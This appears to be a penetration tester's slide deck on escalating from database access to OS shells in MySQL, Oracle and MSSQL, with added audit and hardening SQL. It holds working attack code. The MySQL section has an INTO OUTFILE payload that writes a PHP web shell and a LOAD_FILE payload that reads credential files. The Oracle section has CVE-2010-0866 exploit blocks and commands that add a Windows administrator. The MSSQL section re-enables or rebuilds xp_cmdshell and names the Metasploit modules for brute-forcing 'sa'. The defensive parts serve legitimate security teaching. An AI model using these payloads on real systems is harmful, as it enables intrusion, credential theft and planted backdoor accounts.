1. Rock'n Roll in Database Security
Prathan Phongthiproek (Lucifer@CITEC)
Senior Information Security Consultant
ACIS ProfessionalCenter
2. Who am I?
CITEC Evolution
Code Name “Lucifer”, Moderator, Speaker
Instructor: Web Application (In) Security 101
Instructor: Mastering in Exploitation
ACIS ProfessionalCenter
RedTeam : Penetration Tester
Instructor / Speaker
Security Consultant / Researcher
Founder of CWH Underground Hacker
Exploits, Vulnerabilities, Papers Disclosure
Milw0rm, Exploit-db, SecurityFocus, Secunia, Zeroday, etc.
http://www.exploit-db.com/author/?a=1275
3. Let's Talk!?
"Get DBA privilege is good but get SHELL is better!!"
MySQL PWNED!! From Web Application to get SHELL
Oracle Escalating Privilege XPL to get SHELL
MSSQL Credentials Attack to get SHELL
5. MySQL Jump into OS
MySQL 5.x Vulnerability, 0-Day on Immunity CANVAS
SQL Injection via Web Application (Top Hit!!)
MySQL INTO OUTFILE (write a file from a query)
Need the FILE privilege on the injected account, and secure_file_priv empty or pointing at the target directory
Need a directory writable by the mysqld process (web root)
Need the absolute path of the web root
Need magic_quotes off: the OUTFILE path must be a quoted string literal and cannot be hex-encoded
UNION SELECT 1,'code',3,4 INTO OUTFILE '/www/htdocs/shell.php'
MySQL LOAD_FILE() function (Better!!): read config files and harvest database credentials; needs FILE privilege too
Need the absolute path (hex-encoded, so no quotes are required)
Need the phpMyAdmin path, or MySQL port 3306 reachable through the firewall, to use the recovered credentials
UNION SELECT 1,LOAD_FILE(0x4332…………)
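Worked example of the two MySQL paths above, added here and not part of the original slides: the precondition checks an attacker (or a defender auditing the web application's database account) runs first, the INTO OUTFILE and LOAD_FILE payloads, and the server-side settings that close both paths. The web root /var/www/htdocs, the account 'webapp'@'localhost', the config file /var/www/config.php and the my.cnf path are assumptions for illustration.

```sql
-- 1. Preconditions: the FILE privilege and secure_file_priv decide whether OUTFILE/LOAD_FILE
--    work at all. Run these through the UNION injection point or directly from a MySQL session.
SELECT @@version, @@datadir, @@secure_file_priv;   -- '' = no path restriction, NULL = file I/O disabled
SELECT grantee, privilege_type
FROM information_schema.user_privileges
WHERE privilege_type = 'FILE';                     -- the injected account must appear here

-- 2. Write path: drop a PHP shell into the web root. The OUTFILE path MUST be a quoted literal
--    (hex is not accepted there), which is why magic_quotes_gpc has to be off. The file body,
--    by contrast, can be hex-encoded so the payload carries no quotes at all:
--    0x3c3f70... decodes to <?php system($_GET['c']); ?>
--    The column count (4 here) has to match the SELECT list of the query being injected into.
SELECT 1, 0x3c3f7068702073797374656d28245f4745545b2763275d293b203f3e, 3, 4
INTO OUTFILE '/var/www/htdocs/shell.php';

-- 3. Read path: pull the application's DB config with a hex-encoded path.
--    0x2f7661... decodes to /var/www/config.php. LOAD_FILE() returns NULL when the file is
--    missing, unreadable by mysqld, outside secure_file_priv, or larger than max_allowed_packet.
--    HEX() keeps the content intact when the page renders the UNION column.
SELECT 1, HEX(LOAD_FILE(0x2f7661722f7777772f636f6e6669672e706870)), 3, 4;

-- 4. Hardening (run as root): the web application account never needs FILE, and
--    secure_file_priv confines all file I/O to one directory outside the web root.
REVOKE FILE ON *.* FROM 'webapp'@'localhost';
FLUSH PRIVILEGES;
-- In /etc/my.cnf (assumed path), then restart mysqld:
--   [mysqld]
--   secure_file_priv = /var/lib/mysql-files
```

Re-run step 1 after the change: the FILE row for 'webapp'@'localhost' must be gone and @@secure_file_priv must show the confined directory, at which point both payloads fail regardless of the web application's own bugs.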
8. Oracle Escalating Privilege XPL to get SHELL
DBMS_JVM_EXP_PERMS package: IMPORT_JVM_PERMS accepts a policy table built by the caller, so any user that can connect can grant themselves Java IO privileges
CVE-2010-0866
Affects Oracle 10g-11g (Windows only)
Defense
Apply the October 2010 Critical Patch Update (or any later cumulative CPU)
Oracle 11gR2 on Windows is still secure
Revoke EXECUTE on DBMS_JVM_EXP_PERMS from PUBLIC and from any user that does not need it
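Added example, not part of the original slides, of how a DBA audits and closes the DBMS_JVM_EXP_PERMS hole described above: who can call the package, which Java permissions have landed on ordinary accounts, and how to remove them. The role allowlist in the NOT IN list and the SEQ value 1234 are assumptions for illustration; take the real SEQ from the output of the second query.

```sql
-- Run from SQL*Plus as SYS or a DBA.

-- 1. Who can execute the packages the exploit relies on?
--    Out of the box DBMS_JVM_EXP_PERMS is granted to PUBLIC, so every account can call it.
SELECT grantee, privilege
FROM   dba_tab_privs
WHERE  owner = 'SYS'
AND    table_name IN ('DBMS_JVM_EXP_PERMS', 'DBMS_JAVA_TEST');

-- 2. Look for the exact grants the exploit creates: file and runtime permissions held by
--    anyone outside the roles that legitimately carry them (allowlist is an assumption; tune it).
SELECT seq, kind, grantee, type_name, name, action, enabled
FROM   dba_java_policy
WHERE  type_name IN ('java.io.FilePermission', 'java.lang.RuntimePermission')
AND    grantee NOT IN ('SYS', 'PUBLIC', 'JAVASYSPRIV', 'JAVAUSERPRIV', 'JAVADEBUGPRIV', 'JAVA_ADMIN')
ORDER  BY grantee, seq;
-- A row such as   GRANT  SCOTT  java.io.FilePermission  <<ALL FILES>>  execute  ENABLED
-- is the footprint of the XPL on this page.

-- 3. Pull a rogue grant by its SEQ (from step 2): disable it first, then delete it.
EXEC DBMS_JAVA.DISABLE_PERMISSION(1234);
EXEC DBMS_JAVA.DELETE_PERMISSION(1234);

-- 4. Close the door: nobody but SYS needs to import JVM permissions.
REVOKE EXECUTE ON sys.dbms_jvm_exp_perms FROM PUBLIC;
-- Re-run step 1 to confirm only intended grantees remain, and keep the CPU applied:
-- the revoke stops the PUBLIC path, the patch fixes the missing check in IMPORT_JVM_PERMS.
```

Schedule query 2 as a periodic check: a new java.io.FilePermission on <<ALL FILES>> with action execute for a non-administrative grantee is a high-confidence signal of this exploit or a copycat, even after the package grant has been revoked.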
9. Oracle Escalating Privilege XPL to get SHELL
XPL Code (Grant JAVA IO Privilege)
-- Each anonymous block builds a one-row policy table and hands it to IMPORT_JVM_PERMS,
-- which writes it into the Java policy without checking that the caller may grant it.
-- Run from SQL*Plus as the low-privileged user you want to escalate.
-- Block 1: execute permission on every file (lets the JVM spawn cmd.exe)
DECLARE
  POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
  CURSOR C1 IS
    SELECT 'GRANT', USER(), 'SYS', 'java.io.FilePermission', '<<ALL FILES>>', 'execute', 'ENABLED' FROM dual;
BEGIN
  OPEN C1; FETCH C1 BULK COLLECT INTO POL; CLOSE C1;
  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
-- Block 2: writeFileDescriptor, so the JVM can feed the spawned process
DECLARE
  POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
  CURSOR C1 IS
    SELECT 'GRANT', USER(), 'SYS', 'java.lang.RuntimePermission', 'writeFileDescriptor', NULL, 'ENABLED' FROM dual;
BEGIN
  OPEN C1; FETCH C1 BULK COLLECT INTO POL; CLOSE C1;
  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
-- Block 3: readFileDescriptor, so the JVM can read the spawned process's output
DECLARE
  POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
  CURSOR C1 IS
    SELECT 'GRANT', USER(), 'SYS', 'java.lang.RuntimePermission', 'readFileDescriptor', NULL, 'ENABLED' FROM dual;
BEGIN
  OPEN C1; FETCH C1 BULK COLLECT INTO POL; CLOSE C1;
  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
10. Oracle Escalating Privilege XPL to get SHELL
XPL Code (OS Execute)
-- With the Java permissions from slide 9 in place, DBMS_JAVA_TEST.FUNCALL runs an OS command
-- through the Wrapper class. The command runs with the privileges of the Oracle service account.
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper', 'main',
       'c:\windows\system32\cmd.exe', '/c', 'net user prathan 1234 /add') FROM dual;
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper', 'main',
       'c:\windows\system32\cmd.exe', '/c', 'net localgroup administrators prathan /add') FROM dual;
12. MSSQL Credentials Attack to get SHELL
'sa' is the God account: a sysadmin whose OS commands run as the SQL Server service account (often LocalSystem on Windows)
Default 'sa' password is blank or guessable
Requires the "xp_cmdshell" extended stored procedure (disabled by default on MSSQL 2005+)
Enable it with osql / sqlcmd
On MSSQL 2005
EXEC sp_configure 'show advanced options', 1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE
13. MSSQL Credentials Attack to get SHELL
On MSSQL 2000
xp_cmdshell was dropped with sp_dropextendedproc
-- Option 1: re-register the extended procedure from the DLL that implements it
EXEC sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
GO
-- Option 2: if the DLL is gone, rebuild xp_cmdshell on top of OLE Automation (sp_OA*),
-- which is available on SQL 2000 unless the sp_OA procedures were dropped too
CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int
SET @result = 0
-- create a WScript.Shell COM object inside the SQL Server process
EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
-- Run(@cmd, windowStyle = 0 hidden, waitOnReturn = @Wait)
EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OADestroy @ShellID
RETURN @result
GO
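Added example, not part of the original slides: the T-SQL a tester runs right after logging in as sa to confirm what slides 12 and 13 assume (sysadmin membership, the state of xp_cmdshell and OLE Automation, the service account, the sa login itself), followed by the settings that reverse that attack path. sys.dm_server_services needs SQL Server 2008 R2 SP1 or later; the login name appsvc and the renamed sa name are assumptions for illustration.

```sql
-- 1. What did we land as?
SELECT SUSER_SNAME()               AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin,   -- 1 = can flip every server option below
       @@version                    AS version;

-- 2. Current state of the two switches the attack relies on (value_in_use = effective setting)
SELECT name, value, value_in_use
FROM   sys.configurations
WHERE  name IN ('xp_cmdshell', 'Ole Automation Procedures', 'show advanced options');

-- 3. Whose rights will xp_cmdshell commands run with? (2008 R2 SP1+)
SELECT servicename, service_account FROM sys.dm_server_services;

-- 4. The sa login itself: disabled? password policy enforced? when was it last changed?
SELECT name, is_disabled, is_policy_checked, is_expiration_checked, modify_date
FROM   sys.sql_logins
WHERE  sid = 0x01;                                   -- sa keeps sid 0x01 even after a rename

-- 5. Proof of execution once slide 12's sp_configure steps have run
EXEC master..xp_cmdshell 'whoami';

-- 6. Defensive settings: undo the enablement, keep OLE Automation off so the WScript.Shell
--    rebuild from slide 13 fails as well, and take sa out of play. Order matters: turn the
--    advanced options off only after the two features, or the names are no longer visible.
EXEC sp_configure 'xp_cmdshell', 0;               RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 0; RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;     RECONFIGURE;
ALTER LOGIN sa DISABLE;
ALTER LOGIN sa WITH NAME = [dbadmin_s4];             -- new name is an assumption

-- 7. The web application's login must not be a sysadmin, or a single injection
--    re-enables everything above with the same sp_configure calls.
SELECT IS_SRVROLEMEMBER('sysadmin', 'appsvc') AS app_is_sysadmin;   -- expected: 0
```

The sid = 0x01 lookup in step 4 is the check to keep: renaming sa is a common hardening step, and a login list filtered by name would miss the renamed account while the brute-force modules on the next slide still find it by trying the new name.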
14. MSSQL Credentials Attack to get SHELL
Brute-force the 'sa' password, then use the sa credentials to run OS commands on the target with Metasploit modules
scanner/mssql/mssql_ping
scanner/mssql/mssql_login
admin/mssql/mssql_exec
windows/smb/psexec